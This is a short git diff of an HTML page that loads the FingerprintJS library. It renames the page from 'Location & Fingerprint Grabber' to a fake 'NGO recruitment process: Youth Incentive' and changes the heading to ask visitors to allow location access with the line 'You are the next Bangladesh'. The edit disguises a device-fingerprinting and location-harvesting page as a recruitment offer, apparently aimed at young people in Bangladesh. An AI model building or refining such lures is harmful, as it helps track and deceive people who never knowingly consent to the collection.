--- a/index.html
+++ b/index.html
@@ -2,11 +2,11 @@
 <html lang="en">
 <head>
   <meta charset="UTF-8">
-  <title>Location & Fingerprint Grabber</title>
+  <title>NGO recruitment process: Youth Incentive</title>
   <script src="https://cdn.jsdelivr.net/npm/@fingerprintjs/fingerprintjs@3/dist/fp.min.js"></script>
 </head>
 <body>
-  <h1>Please wait...</h1>
+  <h1>Please wait and allow location... You are the next Bangladesh</h1>
 
   <script>
     const fpPromise = FingerprintJS.load();
